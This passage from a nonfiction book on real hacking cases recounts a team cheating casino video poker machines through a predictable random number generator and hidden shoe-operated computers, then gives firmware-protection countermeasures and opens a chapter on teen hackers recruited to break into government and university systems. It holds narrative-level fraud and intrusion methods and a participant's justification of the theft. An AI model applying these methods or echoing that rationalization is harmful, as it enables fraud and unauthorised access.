Sky” cameras would be distracted by pretty faces and a show of flesh. “So
we pushed that as much as possible,” Alex remembers.
              Chapter 1   Hacking the Casinos for a Million Bucks          9

  The hope was that they could just fit in, blending with the crowd.
“Mike was the best at it. He was sort of balding. He and his wife just
looked like typical players.”
  Alex describes the scene as if it had all happened yesterday. Marco and
Mike probably did it a little differently, but this is how it worked for Alex:
With his wife Annie, he would first scout a casino and pick out one video
poker machine. He needed to know with great precision the exact cycle
time of the machine. One method they used involved stuffing a video
camera into a shoulder bag; at the casino, the player would position the
bag so the camera lens was pointing at the screen of the video poker
machine, and then he would run the camera for a while. “It could be
tricky,” he remembers, “trying to hoist the bag into exactly the right
position without looking like the position really mattered. You just don’t
want to do anything that looks suspicious and draws attention.” Mike
preferred another, less demanding method: “Cycle timing for unknown
machines out in the field was calculated by reading cards off the screen
at two times, many hours apart.” He had to verify that the machine had
not been played in between, because that would alter the rate of iteration,
but that was easy: just check to see that the cards displayed were the same
as when he had last been at the machine, which was usually the case since
“high stakes machines tended to not be played often.”
  When taking the second reading of cards displayed, he would also syn-
chronize his Casio timer, and then phone the machine timing data and
card sequences back to Larry, who would enter it into their home-base
computer and run the program. Based on those data, the computer
would predict the time of the next royal flush. “You hoped it was hours;
sometimes it was days,” in which case they’d have to start all over with
another machine, maybe at a different hotel. At this stage, the timing of
the Casio might be off as much as a minute or so, but close enough.
  Returning plenty early in case someone was already at the target machine,
Alex and Annie would go back to the casino and spend time on other
machines until the player left. Then Alex would sit down at the target
machine, with Annie at the machine next to him. They’d started playing,
making a point of looking like they were having fun. Then, as Alex recalls:

     I’d start a play, carefully synchronized to my Casio timer. When
     the hand came up, I’d memorize it — the value and suit of each
     of the five cards, and then keep playing until I had eight cards in
     sequence in memory. I’d nod to my wife that I was on my way
     and head for an inconspicuous pay phone just off the casino floor.
     I had about eight minutes to get to the phone, do what I had to
     do, and get back to the machine. My wife kept on playing.
 10                           The Art of Intrusion


      Anybody who came along to use my machine, she’d just tell them
      her husband was sitting there.
      We had figured out a way of making a phone call to Larry’s beeper,
      and entering numbers on the telephone keypad to tell him the cards.
      That was so we didn’t have to say the cards out loud — the casino
      people are always listening for things like that. Larry would again
      enter the cards into the computer and run our program.
      Then I’d phone him. Larry would hold the handset up to the com-
      puter, which would give two sets of little cue tones. On the first
      one, I’d hit the Pause button on the timer, to stop it counting
      down. On the second one, I’d hit Pause again to restart the timer.

  The cards Alex reported gave the computer an exact fix on where the
machine’s random number generator was. By entering the delay ordered
by the computer, Alex was entering a crucial correction to the Casio
countdown timer so it would go off at exactly the moment that the royal
flush was ready to appear.

      Once that countdown timer was restarted, I went back to the
      machine. When the timer went like “beep, beep, boom” — right then,
      right on that “boom,” I hit the play button on the machine again.
      That first time, I think I won $35,000.
      We got up to the point where we had about 30 or 40 percent suc-
      cess because it was pretty well worked out. The only times it didn’t
      work was when you didn’t get the timing right.

   For Alex, the first time he won was “pretty exciting, but scary. The pit boss
was this scowling Italian dude. I was sure he was looking at me funny, with
this puzzled expression on his face, maybe because I was going to the phone
all the time. I think he may have gone up to look at the tapes.” Despite the
tensions, there was “a thrill to it.” Mike remembers being “naturally nerv-
ous that someone might have noticed odd behavior on my part, but in fact
no one looked at me funny at all. My wife and I were treated just as typical
high-stakes winners — congratulated and offered many comps.”
   They were so successful that they needed to worry about winning so much
money that they would draw attention to themselves. They started to rec-
ognize that they faced the curious problem of too much success. “It was very
high profile. We were winning huge jackpots in the tens of thousands of dol-
lars. A royal flush pays 4,000 to 1; on a $5 machine, that’s twenty grand.”
   It goes up from there. Some of the games are a type called progressive —
the jackpot keeps increasing until somebody hits, and the guys were able to
win those just as easily.
              Chapter 1   Hacking the Casinos for a Million Bucks         11

     I won one that was 45 grand. A big-belt techie guy came out —
     probably the same guy that goes around and repairs the machines.
     He has a special key that the floor guys don’t have. He opens up
     the box, pulls out the [electronics] board, pulls out the ROM chip
     right there in front of you. He has a ROM reader with him that
     he uses to test the chip from the machine against some golden mas-
     ter that’s kept under lock and key.

  The ROM test had been standard procedure for years, Alex learned. He
assumes that they had “been burned that way” but eventually caught on
to the scheme and put in the ROM-checking as a countermeasure.
  Alex’s statement left me wondering if the casinos do this check because
of some guys I met in prison who did actually replace the firmware. I
wondered how they could do that quickly enough to avoid being caught.
Alex figured this was a social engineering approach, that they had com-
promised the security and paid off somebody inside the casino. He con-
jectures that they might even have replaced the gold master that they’re
supposed to compare the machine’s chip against.
  The beauty of his team’s hack, Alex insisted, was that they didn’t have
to change the firmware. And they thought their own approach offered
much more of a challenge.
  The team couldn’t keep winning as big as they were; the guys figured
“it was clear that somebody would put two and two together and say,
‘I’ve seen this guy before.’ We started to get scared that we were gonna
get caught.”
  Beside the ever-present worries about getting caught, they were also
concerned about the tax issue; for any win over $1,200, the casino asks
for identification and reports the payout to the IRS. Mike says that “If
the player doesn’t produce ID, we assumed that taxes would be withheld
from the payout, but we didn’t want to draw attention to ourselves by
finding out.” Paying the taxes was “not a big issue,” but “it starts to cre-
ate a record that, like, you’re winning insane amounts of money. So a lot
of the logistics were about, ‘How do we stay under the radar?’”
  They needed to come up with a different approach. After a short time
of “E.T. phone home,” they started to conceive a new idea.


New Approach
The guys had two goals this time around: Develop a method that would
let them win on hands like a full house, straight, or flush, so the payouts
wouldn’t be humongous enough to attract attention. And make it some-
how less obvious and less annoying than having to run to the telephone
before every play.
 12                          The Art of Intrusion


  Because the casinos offered only a limited number of the Japanese
machines, the guys this time settled on a machine in wider use, a type
manufactured by an American company. They took it apart the same way
and discovered that the random number generation process was much
more complex: The machine used two generators operating in combina-
tion, instead of just one. “The programmers were much more aware of
the possibilities of hacking,” Alex concluded.
  But once again the four discovered that the designers had made a cru-
cial mistake. “They had apparently read a paper that said you improve the
quality of randomness if you add a second register, but they did it
wrong.” To determine any one card, a number from the first random
number generator was being added to a number from the second.
  The proper way to design this calls for the second generator to
iterate — that is, change its value — after each card is dealt. The design-
ers hadn’t done that; they had programmed the second register to iterate
only at the beginning of each hand, so that the same number was being
added to the result from the first register for each card of the deal.
  To Alex, the use of two registers made the challenge “a cryptology
thing”; he recognized that it was similar to a step sometimes used in
encrypting messages. Though he had acquired some knowledge of the
subject, it wasn’t enough to see his way to a solution, so he started mak-
ing trips to a nearby university library to study up.

      If the designers had read some of the books on cryptosystems more
      carefully, they wouldn’t have made this mistake. Also, they should
      have been more methodical about testing the systems for cracking
      the way we were cracking them.
      Any good college computer science major could probably write
      code to do what we were trying to do once he understands what’s
      required. The geekiest part of it was figuring out algorithms to do
      the search quickly so that it would only take a few seconds to tell
      you what’s going on; if you did it naively, it could take a few
      hours to give you a solution.
      We’re pretty good programmers, we all still make our living
      doing that, so we came up with some very clever optimizations.
      But I wouldn’t say it was trivial.

  I remember a similar mistake made by a programmer at Norton (before
Symantec bought them) that worked on their Diskreet product, an appli-
cation that allowed a user to create encrypted virtual drives. The developer
implemented the algorithm incorrectly — or perhaps intentionally — in a
way that resulted in reducing the space for the encryption key from 56
              Chapter 1   Hacking the Casinos for a Million Bucks            13

bits to 30. The federal government’s data encryption standard used a
56-bit key, which was considered unbreakable, and Norton gave its cus-
tomers the sense that their data was protected to this standard. Because
of the programmer’s error, the user’s data was in effect being encrypted
with only 30 bits instead of 56. Even in those days, it was possible to
brute-force a 30-bit key. Any person using this product labored under a
false sense of security: An attacker could derive his or her key in a rea-
sonable period and gain access to the user’s data. The team had discov-
ered the same kind of error in the programming of the machine.
  At the same time the boys were working on a computer program that
would let them win against their new target machine, they were pressing
Alex for a no-more-running-to-the-payphone approach. The answer
turned out to be based on taking a page from the Eudaemonic Pie solu-
tion: a “wearable” computer. Alex devised a system made up of a minia-
turized computer built around a small microprocessor board Mike and
Marco found in a catalog — and, to go along with it, a control button
that fit in the shoe, plus a silent vibrator like the ones common in many
of today’s cell phones. They referred to the system as their “computer-
in-the-pocket thing.”
  “We had to be a little clever about doing it on a small chip with a small
memory,” Alex said. “We did some nice hardware to make it all fit in the
shoe and be ergonomic.” (By “ergonomic” in this context, I think he
meant small enough so you could walk without limping!)


The New Attack
The team began trying out the new scheme, and it was a bit nerve-
wracking. Sure, they could now dispense with the suspicious behavior of
running to a pay phone before every win. But even with all the dress
rehearsal practice back at their “office,” opening night meant performing
in front of a sizeable audience of always-suspicious security people.
  This time the program was designed so they could sit at one machine
longer, winning a series of smaller, less suspicious amounts. Alex and
Mike recapture some of tension when they describe how it worked:

     Alex: I usually put the computer in what looked like a little tran-
     sistor radio in my pocket. We would run a wire from the computer
     down inside the sock into this switch in the shoe.
     Mike: I strapped mine to my ankle. We made the switches from
     little pieces of breadboard [material used in a hardware lab for
     constructing mock-ups of electronic circuits]. The pieces were
     about one inch square, with a miniature button. And we sewed
     on a little bit of elastic to go around the big toe. Then you’d cut a
 14                            The Art of Intrusion


      hole in a Dr. Scholl’s insole to keep it in place in your shoe. It was
      only uncomfortable if you were using it all day; then it could get
      excruciating.
      Alex: So you go into the casino, you try to look calm, act like
      there’s nothing, no wires in your pants. You go up, you start play-
      ing. We had a code, a kind of Morse Code thingy. You put in
      money to run up a credit so you don’t have to keep feeding coins,
      and then start to play. When cards come up, you click the shoe
      button to input what cards are showing.
      The signal from the shoe button goes into the computer that’s in
      my pants pocket. Usually in the early machines it took seven or
      eight cards to get into sync. You get five cards on the deal, you
      might draw three more would be a very common thing, like hold
      the pair, draw the other three, that’s eight cards.
      Mike: The code for tapping on the shoe-button was binary, and it
      also used a compression technique something like what’s called a
      Huffman code. So long-short would be one-zero, a binary two.
      Long-long would be one-one, a binary three, and so on. No card
      required more than three taps.
      Alex: If you held the button down for three seconds, that was a
      cancel. And [the computer] would give you little prompts — like
      dup-dup-dup would mean, “Okay, I’m ready for input.” We had
      practiced this — you had to concentrate and learn how to do it.
      After a while we could tap, tap while carrying on a conversation
      with a casino attendant.
      Once I had tapped in the code to identify about eight cards, that
      would be enough for me to sync with about 99 percent assurance.
      So after anywhere from a few seconds to a minute or so, the com-
      puter would buzz three times.
      I’d be ready for the action.

  At this point, the computer-in-the-pocket had found the place in the
algorithm that represented the cards just dealt. Since its algorithm was
the same as the one in the video poker machine, for each new hand dealt,
the computer would “know” what five additional cards were in waiting
once the player selected his discards and would signal which cards to hold
to get a winning hand. Alex continued:

      The computer tells you what to do by sending signals to a vibra-
      tor in your pocket; we got the vibrators free by pulling them out of
      old pagers. If the computer wants you to hold the third and the
              Chapter 1   Hacking the Casinos for a Million Bucks           15

     fifth card, it will go beep, beep, beeeeep, beep, beeeeep, which you
     feel as vibrations in your pocket.
     We computed that if we played carefully, we had between 20 and
     40 percent vigorish, meaning a 40 percent advantage on every
     hand. That’s humongous — the best blackjack players in the
     world come in at about 2-1/2 percent.
     If you’re sitting at a $5 machine pumping in five coins at a time,
     twice a minute, you can be making $25 a minute. In half an
     hour, you could easily make $1,000 bucks. People sit down and get
     lucky like that every day. Maybe 5 percent of the people that sit
     down and play for half an hour might do that well. But they don’t
     do it every time. We were making that 5 percent every single time.

  Whenever one of them had won big in one casino, he’d move on to
another. Each guy would typically hit four or five in a row. When they
went back to the same casino on another trip a month later, they’d make
a point of going at a different time of day, to hit a different shift of the
work crew, people less likely to recognize them. They also began hitting
casinos in other cities — Reno, Atlantic City, and elsewhere.
  The trips, the play, the winning gradually became routine. But on one
occasion, Mike thought the moment they all dreaded had come. He had
just “gone up a notch” and was playing the $25 machines for the first
time, which added to the tension because the higher the value of the
machines, the closer they’re watched.

     I was a bit anxious but things were going better than I antici-
     pated. I won about $5,000 in a relatively short amount of time.
     Then this large, imposing employee taps me on the shoulder. I
     looked up at him feeling something queasy in the pit of my stom-
     ach. I thought, “This is it.”
     “I notice you been playing quite a bit,” he said. “Would you like
     pink or green?”

  If it had been me, I would have been wondering, “What are those —
my choices of the color I’ll be after they finish beating me to a pulp?” I
think I might have left all my money and tried to dash out of the place.
Mike says he was seasoned enough by that point to remain calm.

     The man said, “We want to give you a complimentary coffee mug.”

  Mike chose the green.
 16                            The Art of Intrusion


  Marco had his own tense moment. He was waiting for a winning hand
when a pit boss he hadn’t noticed stepped up to his shoulder. “You dou-
bled up to five thousand dollars — that’s some luck,” he said, surprised.
An old woman at the next machine piped up in a smoker’s raspy sandpa-
per voice, “It ... wasn’t ... luck.” The pit boss stiffened, his suspicions
aroused. “It was balls,” she cawed. The pit boss smiled and walked away.
  Over a period of about three years, the guys alternated between taking
legitimate consulting jobs to keep up their skills and contacts, and skip-
ping out now and then to line their pockets at the video poker machines.
They also bought two additional machines, including the most widely
used video poker model, and continued to update their software.
  On their trips, the three team members who traveled would head out
to different casinos, “not all go as a pack,” Alex said. “We did that once
or twice, but it was stupid.” Though they had an agreement to let each
other know what they were up to, occasionally one would slip away to
one of the gambling cities without telling the others. But they confined
their play to casinos, never playing in places like 7-Elevens or supermar-
kets because “they tend to have very low payouts.”


Caught!
Alex and Mike both tried to be disciplined about adhering to “certain
rules that we knew were going to reduce the probability of getting
noticed. One of them was to never hit a place for too much money, never
hit it for too much time, never hit it too many days in a row.”
  But Mike took the sense of discipline even more seriously and felt the
other two weren’t being careful enough. He accepted winning a little less
per hour but looking more like another typical player. If he got two aces
on the deal and the computer told him to discard one or both of the aces
for an even better hand — say, three jacks — he wouldn’t do it. All casi-
nos maintain “Eye in the Sky” watchers in a security booth above the
casino floor, manning an array of security cameras that can be turned,
focused and zoomed, searching for cheaters, crooked employees, and
others bent by the temptation of all that money. If one of the watchers
happened to be peeking at his or her machine for some reason, the
watcher would immediately know something was fishy, since no reason-
able player would give up a pair of aces. Nobody who wasn’t cheating
somehow could know a better hand was waiting.
  Alex wasn’t quite so fastidious. Marco was even less so. “Marco was a
bit cocky,” in Alex’s opinion:

      He’s a very smart guy, self taught, never finished high school, but one
      of these brilliant Eastern European type of guys. And flamboyant.
              Chapter 1   Hacking the Casinos for a Million Bucks            17

     He knew everything about computers but he had it in his head
     that the casinos were stupid. It was easy to think that because these
     people were letting us get away with so much. But even so, I think
     he got over-confident.
     He was more of a daredevil, and also didn’t fit the profile because
     he just looked like this teenage foreigner. So I think he tended to
     arouse suspicion. And he didn’t go with a girlfriend or wife,
     which would have helped him fit in better.
     I think he just ended up doing things that brought attention onto
     him. But also, as time went on and we all got bolder, we evolved
     and tended to go to the more expensive machines that paid off bet-
     ter and that again put more risks into the operation.

  Though Mike disagrees, Alex seemed to be suggesting that they were
all three risk takers who would keep pushing the edge of the window to
see how far they could go. As he put it, “I think basically you just keep
upping the risk.”
  The day came when one minute Marco was sitting at a machine in a
casino, the next minute he was surrounded by burly security people who
pulled him up and pushed him into an interviewing room in the back.
Alex recounted the scene:

     It was scary because you hear stories about these guys that will
     beat the shit out of people. These guys are famous for, “F__k the
     police, we’re gonna take care of this ourself.”
     Marco was stressed but he was a very tough character. In fact, in
     some ways I’m glad that he was the one that did get caught if any
     of us were going to because I think he was the most equipped to
     handle that situation. For all I know he had handled things like
     back in Eastern Europe.
     He exhibited some loyalty and did not give us up. He didn’t talk
     about any partners or anything like that. He was nervous and
     upset but he was tough under fire and basically said he was work-
     ing alone.
     He said, “Look, am I under arrest, are you guys police, what’s the
     deal?”
     It’s a law enforcement type of interrogation except that they’re
     not police and don’t have any real authority, which is kind of
     weird. They kept on questioning him, but they didn’t exactly
     manhandle him.
 18                        The Art of Intrusion


  They took his “mug shot,” Alex says, and they confiscated the com-
puter and all the money he had on him, about $7,000 in cash. After per-
haps an hour of questioning, or maybe a lot longer — he was too upset
to be sure — they finally let him go.
  Marco called his partners en route home. He sounded frantic. He said,
“I want to tell you guys what happened. I sort of screwed up.”
  Mike headed straight for their headquarters. “Alex and I were freaked
when we heard what happened. I started tearing the machines apart and
dumping pieces all over the city.”
  Alex and Mike were both unhappy with Marco for one of the unneces-
sary risks he ran. He wouldn’t put the button in his shoe like the other
two, stubbornly insisting on carrying the device in his jacket pocket and
triggering it with his hand. Alex described Marco as a guy who “thought
the security people were so dumb that he could keep pushing the enve-
lope with how much he was doing right under their noses.”
  Alex is convinced he knows what happened, even though he wasn’t
present. (In fact, the other three didn’t know Marco had gone on a
casino trip despite the agreement to clue each other in on their plans.)
The way Alex figures, “They just saw that he was winning a ridiculous
amount and that there was something going on with his hand.” Marco
simply wasn’t bothering to think about what could cause the floor peo-
ple to notice him and wonder.
  That was the end of it for Alex, though he’s not entirely sure about the
others. “Our decision at the beginning was that if any of us was ever
caught, we would all stop.” He said, “We all adhered to that as far as I
know.” And after a moment, he added with less certainty, “At least I
did.” Mike concurs, but neither of them has ever asked Marco the ques-
tion directly.
  The casinos don’t generally prosecute attacks like the one that the guys
had pulled. “The reason is they don’t want to publicize that they have
these vulnerabilities,” Alex explains. So it’s usually, “Get out of town
before sundown. And if you agree never to set foot in a casino again, then
we’ll let you go.”


Aftermath
About six months later, Marco received a letter saying that charges
against him were not being pressed.
  The four are still friends, though they aren’t as close these days. Alex
figures he made $300,000 from the adventure, part of which went to
Larry as they had agreed. The three casino-going partners, who took all
              Chapter 1   Hacking the Casinos for a Million Bucks           19

the risk, had initially said they would split equally with each other, but
Alex thinks Mike and Marco probably took $400,000 to half a million
each. Mike wouldn’t acknowledge walking away with any more than
$300,000 but admits that Alex probably got less than he did.
   They had had a run of about three years. Despite the money, Alex was
glad it was over: “In a sense, I was relieved. The fun had worn off. It had
become sort of a job. A risky job.” Mike, too, wasn’t sorry to see it end,
lightly complaining that “it got kind of grueling.”
   Both of them had been reluctant at first about telling their story but
then took to the task with relish. And why not — in the 10 or so years
since it happened, none of the four has ever before shared even a whis-
per of the events with anyone except the wives and the girlfriend who
were part of it. Telling it for the first time, protected by the agreement of
absolute anonymity, seemed to come as a relief. They obviously enjoyed
reliving the details, with Mike admitting that it had been “one of the
most exciting things I’ve ever done.”
   Alex probably speaks for them all when he expresses his attitude toward
their escapade:

     I don’t feel that bad about the money we won. It’s a drop in the
     bucket for that industry. I have to be honest: we never felt morally
     compromised, because these are the casinos.
     It was easy to rationalize. We were stealing from the casinos that
     steal from old ladies by offering games they can’t win. Vegas felt
     like people plugged into money-sucking machines, dripping their
     life away quarter by quarter. So we felt like we were getting back
     at Big Brother, not ripping off some poor old lady’s jackpot.
     They put a game out there that says, “If you pick the right cards,
     you win.” We picked the right cards. They just didn’t expect any-
     body to be able to do it.

  He wouldn’t try something like this again today, Alex says. But his rea-
son may not be what you expect: “I have other ways of making money.
If I were financially in the same position I was in then, I probably would
try it again.” He sees what they did as quite justified.
  In this cat-and-mouse game, the cat continually learns the mouse’s new
tricks and takes appropriate measures. The slot machines these days use
software of much better design; the guys aren’t sure they would be suc-
cessful if they did try to take another crack at it.
  Still, there will never be a perfect solution to any techno-security issue.
Alex puts the issue very well: “Every time some [developer] says,
 20                          The Art of Intrusion


‘Nobody will go to the trouble of doing that,’ there’s some kid in Finland
who will go to the trouble.”
  And not just in Finland but in America, as well.


INSIGHT
In the 1990s, the casinos and the designers of gambling machines hadn’t
yet figured out some things that later became obvious. A pseudo random
number generator doesn’t actually generate random numbers. Instead, it
in effect warehouses a list of numbers in a random order. In this case, a
very long list: 2 to the 32nd power, or over four billion numbers. At the
start of a cycle, the software randomly selects a place in the list. But after
that, until it starts a new cycle of play, it uses the ensuing numbers from
the list one after the other.
  By reverse-engineering the software, the guys had obtained the list.
From any known point in the “random” list, they could determine every
subsequent number in the list, and with the additional knowledge about
the iteration rate of a particular machine, they could determine how long
in minutes and seconds before the machine would display a royal flush.


COUNTERMEASURES
Manufacturers of every product that uses ROM chips and software
should anticipate security problems. And for every company that uses
software and computer-based products — which these days means pretty
nearly every company down to one-person shops — it’s dangerous to
assume that the people who build your systems have thought about all
the vulnerabilities. The programmers of the software in the Japanese slot
machine had made a mistake in not thinking far enough ahead about
what kinds of attacks might be made. They hadn’t taken any security
measures to protect people from getting at the firmware. They should
have foreseen somebody gaining access to a machine, removing the
ROM chip, reading the firmware, and recovering the program instruc-
tions that tell the machine how to work. Even if they considered that pos-
sibility, they probably assumed that knowing precisely how the machine
worked wouldn’t be enough, figuring that the computational complexity
of cracking the random number generator would defeat any attempt —
which may well be true today but was not at the time.
  So your company markets hardware products that contain computer
chips; what should you be doing to provide adequate protection against
             Chapter 1   Hacking the Casinos for a Million Bucks      21

the competitor who wants a look at your software, the foreign company
that wants to do a cheap knockoff, or the hacker who wants to cheat you?
  The first step: Make it difficult to gain access to the firmware. Several
approaches are available, including:

      ●    Purchase chips of a type designed to be secure against attack.
           Several companies market chips specifically designed for situ-
           ations where the possibility of attack is high.
      ●    Use chip on-board packaging — a design in which the chip is
           embedded into the circuit board and cannot be removed as a
           separate element.
      ●    Seal the chip to the board with epoxy, so that if an attempt is
           made to remove it, the chip will break. An improvement on
           this technique calls for putting aluminum powder in the
           epoxy; if an attacker attempts to remove the chip by heating
           the epoxy, the aluminum destroys the chip.
      ●    Use a ball grid array (BGA) design. In this arrangement, the
           connectors do not come out from the sides of the chip but
           instead are beneath the chip, making it difficult if not impos-
           sible to capture signal flow from the chip while it is in place
           on the board.

  Another available countermeasure calls for scratching any identifying
information off the chip, so an attacker will be deprived of information
about the manufacturer and type of chip.
  A fairly common practice, one used by the machine manufacturers in
this story, calls for the use of checksumming (hashing) — including a
checksum routine in the software. If the program has been altered, the
checksum will not be correct and the software will not operate the device.
However, knowledgeable hackers familiar with this approach simply
check the software to see whether a checksum routine has been included,
and if they find one, disable it. So one or more of the methods that pro-
tect the chip physically is a much better plan.


THE BOTTOM LINE
If your firmware is proprietary and valuable, consult the best security
sources to find out what techniques hackers are currently using. Keep
your designers and programmers up-to-date with the latest information.
And be sure they are taking all appropriate steps to achieve the highest
level of security commensurate with cost.
             Chapter 2
  When Terrorists Come Calling
I don’t know why I kept doing it. Compulsive nature? Money hungry? Thirst
for power? I can name a number of possibilities.
                                                                 — ne0h




T
          he 20-year-old hacker who signs as Comrade is just hanging
          around these days in a house that he owns jointly with his
          brother in a nice part of Miami. Their father lives with them,
but that’s only because the kid brother is still a juvenile and Child
Services insists there be an adult living in the home until the boy turns
18. The brothers don’t mind, and Dad has his own apartment elsewhere,
which he’ll move back to when the time comes.
  Comrade’s mom died two years ago, leaving the house to her sons
because she and the boys’ father were divorced. She left some cash as
well. His brother goes to high school, but Comrade is “just hanging
out.” Most of his family disapproves, he says, “but I don’t really care.”
When you’ve been to prison at a young age — in fact, the youngest per-
son ever convicted on federal charges as a hacker — the experience tends
to change your values.
  Hacking knows no international borders, of course, so it makes no dif-
ference to either of them that Comrade’s hacker friend ne0h is some
3,000 miles away. Hacking was what brought them together, and hack-
ing was what took them along a slippery course that would eventually
lead to what they would later conjecture was serving the cause of inter-
national terrorism by conducting break-ins to highly sensitive computer
systems. These days, that’s a heavy burden to bear.


                                     23
 24                          The Art of Intrusion


  A year older than Comrade, ne0h has been “using computers since I
could reach the keyboard.” His father ran a computer hardware store and
would take the youngster along on customer appointments; the boy
would sit on his father’s lap through the sales session. By age 11, he was
writing dBase code for his father’s business.
  Somewhere along the line, ne0h came upon a copy of the book
Takedown (Hyperion Press, 1996) — which is a highly inaccurate
account of my own hacking exploits, my three years on the run, and the
FBI’s search for me. ne0h was captivated by the book:

      You inspired me. You’re my f___ing mentor. I read every possible
      thing about what you did. I wanted to be a celebrity just like you.

  It was the motivation that got him into hacking. He decorated his
room with computers and networking hubs and a 6-foot-long pirate flag,
and set out to walk in my footsteps.
  ne0h began to accumulate solid hacker knowledge and capabilities.
Skills came first; discretion would come later. Using the hackers’ term for
a youngster who’s still a beginner, he explained, “In my script kiddie
days, I defaced Web sites and put up my real email address.”
  He hung around Internet Relay Chat (IRC) sites — text-based
Internet chat rooms where people with a common interest can meet
online and exchange information in real time with others who share the
interest — in fly fishing, antique airplanes, home brewing, or any of
thousands of other topics, including hacking. When you type in a mes-
sage on an IRC site, everybody online at that time sees what you’ve writ-
ten and can respond. Though many people who use IRC regularly don’t
seem to be aware of it, the communications can be easily logged. I think
the logs must by now contain nearly as many words as all the books in
the Library of Congress — and text typed in haste with little thought of
posterity can be retrieved even years later.
  Comrade was spending time on some of the same IRC sites, and he
struck up a long-distance friendship with ne0h. Hackers frequently form
alliances for exchanging information and carrying out group attacks.
ne0h, Comrade, and another kid decided to create their own group,
which they dubbed the “Keebler Elves.” A few additional hackers were
allowed into the group’s conversations, but the three original members
kept the others in the dark about their black-hat attacks. “We were break-
ing into government sites for fun,” Comrade said. He estimates they
broke into “a couple of hundred” supposedly secure government sites.
  A number of IRC channels are watering holes where hackers of differ-
ent stripes gather. One in particular, a network called Efnet, is a site
Comrade describes as “not exactly the computer underground — it’s a
                  Chapter 2   When Terrorists Come Calling            25

pretty big group of servers.” But within Efnet were some less well-known
channels, places you didn’t find your way to on your own but had to be
told about by some other black hat whose trust you had gained. Those
channels, Comrade says, were “pretty underground.”


Khalid the Terrorist Dangles Some Bait
Around 1998 on these “pretty underground” channels, Comrade began
encountering chat about a guy who had been “hanging around” using
the handle RahulB. (Later he would also use Rama3456.) “It was sort of
known that he wanted hackers to break into government and military
computers — .gov and .mil sites,” Comrade said. “Rumor had it that he
worked for Bin Laden. This was before 9/11, so Bin Laden wasn’t a
name you heard on the news every day.”
  Eventually Comrade crossed paths with the mystery man, who he
would come to know as Khalid Ibrahim. “I talked to him a few times [on
IRC] and I talked to him on the phone once.” The man had a foreign
accent and “it definitely sounded like an overseas connection.”
  ne0h, too, was targeted; with him Khalid was more direct and more
blatant. ne0h recalls:

     Around 1999, I was contacted by email by a man who called him-
     self a militant and said he was in Pakistan. He gave the name
     Khalid Ibrahim. He told me he worked for Pakistani militants.

   Would someone looking for naive kid hackers really wrap himself in a
terrorist flag — even in the days before 9/11? At first glance the notion
seems absurd. This man would later claim he had gone to school in the
United States, done a little hacking himself, and associated with hackers
while he was here. So he may have known, or thought he knew, some-
thing of the hacker’s mindset. Every hacker is to some extent a rebel who
lives by different standards and enjoys beating the system. If you want to
set out a honeypot for hackers, maybe announcing that you too are a
rule-breaker and an outsider wouldn’t be so stupid after all. Maybe it
would make your story all the more believable, and your intended con-
federates that much less wary and suspicious.
   And then there was the money. Khalid offered ne0h $1,000 for hack-
ing into the computer networks of a Chinese university — a place that
ne0h refers to as the MIT of China — and providing him the student
database files. Presumably this was a test, both of ne0h’s hacking ability
and of his ingenuity: How do you hack into a computer system when you
don’t read the language? Even harder: How do you social engineer your
way in when you don’t speak the language?
 26                         The Art of Intrusion


   For ne0h, the language issue turned out to be no barrier at all. He
began hanging around the IRC sites used by a hacker group called
gLobaLheLL and through that group had made contact with a computer
student at the university. He got in touch and asked the student for a
couple of usernames and passwords. The sign-on information came back
in short order — one hacker to another, no questions asked. ne0h found
that computer security at the university ranked somewhere between
dreadful and lousy, especially surprising for a technology/engineering
university where they should have known better. Most of the students
have chosen passwords identical to their usernames — the same word or
phrase for both uses.
   The short list that the student had provided was enough to give ne0h
access, allowing him to start snooping around electronically — sniffing,
in hackerspeak. This turned up a student — we’ll call him Chang — who
was accessing FTPs (download sites) in the United States. Among these
FTPs was a “warez” site — a place for retrieving software. Using a stan-
dard social engineering trick, ne0h drifted around the college network
picking up some of the campus lingo. This was easier than it at first
sounds, since “most of them speak English,” ne0h says. Then he got in
touch with Chang, using an account that made it seem as if ne0h was
contacting him from the campus computer science lab.
   “I’m from Block 213,” he told Chang electronically, and he made a
straightforward request for student names and e-mail addresses, like any
student interested in getting in touch with classmates. Because most of the
passwords were so easy, getting into the student’s files was a no-brainer.
   Very soon he was able to deliver to Khalid database information on
about a hundred students. “I gave him those and he said, ‘I’ve got all I
need.’” Khalid was satisfied; clearly he hadn’t wanted the names at all; he
had just wanted to see if ne0h could actually come up with the informa-
tion from such a remote source. “That’s pretty much where our rela-
tionship started,” ne0h sums up. “I could do the job, he knew I could
do the job, so he started giving me other things to do.”
   Telling ne0h to watch his mailbox for his thousand dollars, Khalid
started calling by cell phone about once a week, “usually while he was
driving.” The next assignment was to hack into the computer systems of
India’s Bhabha Atomic Research Center. The outfit was running a Sun
workstation, which is familiar ground for every hacker. ne0h got into it
easily enough but found the machine didn’t have any information of
interest on it and appeared to be a standalone, not connected to any net-
work. Khalid seemed unfazed by the failure.
   Meanwhile, the money for the Chinese university hack still hadn’t
shown up. When ne0h asked, Khalid got upset. “You never got it?! I sent
it to you in cash in a birthday card!” he insisted. Obviously this was the
                   Chapter 2   When Terrorists Come Calling                27

timeworn “Your check is in the mail” ploy, yet ne0h was willing to keep
on accepting assignments. Why? Today he leans toward introspection:

     I kept on because I’m stubborn. It was actually a thrill to think I
     was going to be paid for it. And I was thinking, “Maybe it really
     was lost in the mail, maybe he will pay me this time.”
     I don’t know why I kept doing it. Compulsive nature? Money
     hungry? Thirst for power? I can name a number of possibilities.

  At the same time that Khalid was feeding assignments to ne0h, he was
also trolling the IRC sites for other willing players. Comrade was willing,
though wary of accepting payment:

     I had understood that he was paying people but I never wanted to
     give out my information in order to receive money. I figured that
     what I was doing was just looking around, but if I started receiv-
     ing money, it would make me a real criminal. At most I would
     talk to him on IRC and throw him a few hosts now and then.

  Reporter Niall McKay talked to another fish that Khalid caught in his
net, a California teen whose handle was Chameleon (and who is now
cofounder of a successful security software company). The McKay story on
Wired.com1 dovetailed with the details provided by ne0h and Comrade.
“I was on IRC one night when this guy said he wanted the DEM soft-
ware. I didn’t have it and I was just messing about with the guy,” the
hacker claimed. By this time Khalid was growing serious: “DEM” is the
nickname for the Defense Information Systems Network Equipment
Manager, networking software used by the military. The program was cap-
tured by the hacker group Masters of Downloading, and word was get-
ting around that the program was available if you asked the right person.
No one seems to know whether Khalid ever got his hands on it — or at
least, no one is saying. In fact, it’s not even certain the software would
have been of any value to him — but he obviously thought it would.
Khalid was through playing games about Chinese universities and the like.
  “He tried to integrate himself into what the guys in the group were
doing,” ne0h told us. Before it was over, Khalid would shadow the hackers
for a year and a half, “not like some random person popping in and out but
